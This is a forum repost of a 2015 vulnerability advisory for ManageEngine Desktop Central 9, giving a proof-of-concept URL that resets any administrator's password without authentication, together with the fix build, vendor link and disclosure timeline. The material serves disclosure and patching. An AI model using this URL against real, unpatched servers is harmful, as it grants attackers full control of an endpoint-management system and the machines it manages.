Jump to content
KhiZaRix

Manage Engine Desktop Central 9 Unauthorized Administrative Password Reset

Recommended Posts

Posted

A vulnerability exists in the Manage Engine Desktop Central 9 application that affects version (build 90130). This may affect earlier releases as well.

The vulnerability allows a remote unauthenticated user to change the password of any Manage Engine Desktop Central user with the ‘Administrator’ role (DCAdmin).

The following proof of concept URL changes the ‘admin’ user password to ‘admin3’.

http://<IP>:8020/servlets/DCOperationsServlet?operation=addOrModifyUser&roleId=DCAdmin&userName=admin&password=admin3

The XML response suggests the user modification failed, however a user can perform a successful login with the supplied credentials:

<operation>

<operationstatus>Failure</operationstatus>

<message>Problem while modifying user admin in DC.</message>

</operation>

Complete control of the application can now be obtained by an unauthorised user.

Vulnerability remediation:

This vulnerability was fixed in Desktop Central build 90135. Refer to the vendor advisory for product update information and instructions.

Vendor advisory:

https://www.manageengine.com/products/desktop-central/unauthorized-admin-credential-modification.html

Disclosure timeline:

Vendor notification: 02/02/2015

Follow up with Vendor: 16/02/2015

Fixed released: 18/02/2015

CVE requested: 06/03/2015

CVE assigned: 20/03/2015

Vendor notification: 24/03/2015

Public disclosure: 27/03/2015

Source: http://dl.packetstormsecurity.net/1503-exploits/medc-escalate.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...